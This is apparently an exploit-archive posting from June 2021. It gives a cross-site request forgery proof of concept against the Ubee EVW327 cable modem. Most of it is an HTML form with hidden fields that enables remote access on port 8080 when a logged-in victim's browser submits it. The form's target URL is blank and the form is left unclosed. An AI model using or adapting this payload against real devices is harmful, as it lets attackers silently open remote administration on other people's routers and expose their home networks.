Wednesday, June 2, 2021

Ubee EVW327 Cross Site Request Forgery

# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) 
# Date: 2021-05-30
# Exploit Author: lated
# Vendor Homepage:
# Version: EVW327

<form action="" method="POST">
<input type="hidden" name="RemoteAccessEnable" value="1"/>
<input type="hidden" name="RemoteAccessPort" value="8080"/>
<input type="hidden" name="ApplyRemoteEnableAction" value="1"/>

